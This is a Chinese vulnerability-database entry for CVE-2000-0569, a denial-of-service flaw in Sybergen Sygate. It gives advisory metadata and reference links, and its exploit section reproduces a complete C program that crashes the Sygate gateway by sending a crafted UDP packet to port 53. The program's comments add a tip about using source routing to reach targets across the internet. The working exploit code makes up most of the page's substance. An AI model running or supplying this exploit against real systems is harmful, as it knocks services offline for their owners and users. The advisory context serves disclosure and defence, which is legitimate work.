Sybergen Sygate拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105903 漏洞类型 未知
发布时间 2000-06-30 更新时间 2005-05-02
CVE编号 CVE-2000-0569 CNNVD-ID CNNVD-200006-118
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-118
|漏洞详情
SybergenSygate存在漏洞。远程攻击者借助发送畸形DNSUDP包到内部接口导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1420/info

An exploit which causes a Denial of Service to Sybergen's Sygate when run from an internal machine has been released. The exploit sends a UDP packet to port 53 of the gateway. 

//Sygate Crash by: marc@eeye.com (April-00)
//http://www.eEye.com
//Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
//Play with source routing to get it to work across the internet.
//Just hit the Internal IP of the Sygate machine.

#include <stdio.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
        int SockFD, addrlen, bsent;
        struct sockaddr_in UDPSock;
        char bomb[]= "changeiscoming";

        printf("Sygate Crash by: marc@eeye.com\n");
        printf("http://www.eEye.com\n\n");

        if(argc<2){
                printf("Usage: %s [server]\n",argv[0]);
                exit(1);
        }

        SockFD=socket(AF_INET, SOCK_DGRAM, 0);

        UDPSock.sin_family=AF_INET;
        UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
        UDPSock.sin_port=htons(53);

        bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
sizeof(struct sockaddr_in));

        printf("Sent Crash.\nBytes Sent: %i\n",bsent);
}
|参考资料

来源:BID
名称:1420
链接:http://www.securityfocus.com/bid/1420
来源:WIN2KSEC
名称:20000630AnyLANusercancrashSygate
链接:http://archives.neohapsis.com/archives/win2ksecadvice/2000-q2/0189.html
来源:XF
名称:sygate-udp-packet-dos(5049)
链接:http://xforce.iss.net/static/5049.php